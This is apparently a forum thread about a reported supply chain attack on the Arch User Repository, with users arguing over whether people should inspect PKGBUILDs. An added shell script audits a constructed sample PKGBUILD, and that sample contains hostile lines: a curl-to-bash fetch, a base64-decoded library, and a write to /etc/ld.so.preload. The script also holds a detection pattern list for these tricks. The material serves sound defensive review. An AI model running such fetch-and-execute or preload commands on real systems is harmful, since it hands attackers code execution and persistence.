A massive supply chain attack targeting the Arch User Repository (AUR) has compromised more than 400 community-maintained packages, with attackers injecting malicious build scripts designed to deploy credential-stealing malware and rootkit-style payloads on affected Linux systems.
You’re missing the point entirely. I’m talking about inspecting the scripts, not about making packages.
Sorry if I was unclear. You usually don’t inspect the install scripts for official packages, since you put the trust in the official team. You don’t trust (or at least shouldn’t) AUR packages, hence you should inspect the install script for those packages. I don’t really see what the alternative would be.
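A minimal pre-build check in the spirit of the advice above, added here as an example (not code from the thread, from the AUR, or from makepkg): it greps a PKGBUILD for constructs that deserve a close read before building. The sample PKGBUILD is constructed for the demonstration, and the pattern list is my own assumption about what malicious build scripts tend to contain, not a signature of this incident; a hit means "read this line", not "this is malware".

```shell
#!/bin/sh
# Added example: flag PKGBUILD lines worth reading before running makepkg.
# Pattern list is an assumption, not a signature of any specific incident.

# Constructed sample PKGBUILD for demonstration only (not a real AUR package).
SAMPLE_PKGBUILD=$(mktemp)
trap 'rm -f "$SAMPLE_PKGBUILD"' EXIT
cat > "$SAMPLE_PKGBUILD" <<'EOF'
pkgname=example-tool
pkgver=1.0
source=("https://example.invalid/example-tool-1.0.tar.gz"
        "https://example.invalid/setup.sh")
sha256sums=('SKIP' 'SKIP')
build() {
  cd "$srcdir"
  curl -fsSL https://example.invalid/s | bash
  printf '%s' "$BLOB" | base64 -d > /tmp/lib.so
  echo /tmp/lib.so >> /etc/ld.so.preload
}
EOF

# One entry per line: "<label> <extended regex>" (label has no spaces).
RISKY_PATTERNS='pipe-to-shell (curl|wget)[^|]*[|][[:space:]]*(ba|z)?sh
decode-and-run base64[[:space:]]+(-d|--decode)
ld-preload ld\.so\.preload
unchecked-source (sha[0-9]*|md5|b2)sums=.*SKIP
user-dotfiles \$HOME/\.(ssh|gnupg|bashrc|profile)
persistence (systemctl[[:space:]]+enable|crontab[[:space:]]+-)'

# audit_pkgbuild FILE: prints "label:lineno:text" for every matching line.
audit_pkgbuild() {
  printf '%s\n' "$RISKY_PATTERNS" | while IFS= read -r entry; do
    label=${entry%% *}
    regex=${entry#* }
    grep -En -- "$regex" "$1" | sed "s/^/$label:/"
  done
}

# risk_count FILE: number of flagged lines (0 means nothing flagged, not "safe").
risk_count() {
  audit_pkgbuild "$1" | wc -l | tr -d ' '
}

audit_pkgbuild "$SAMPLE_PKGBUILD"
echo "flagged lines: $(risk_count "$SAMPLE_PKGBUILD")"
```

On the sample above this flags the pipe-to-shell, the base64 decode, the ld.so.preload write and the SKIP checksums; it reports nothing for a PKGBUILD that pins real checksums and only runs the upstream build.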
Well, the alternative would be for the moderation team to inspect them, with clear signaling of which scripts are trusted and which aren’t.
If you doofus can’t read a PKGBUILD, DON’T USE THE AUR. Might also keep the shell closed.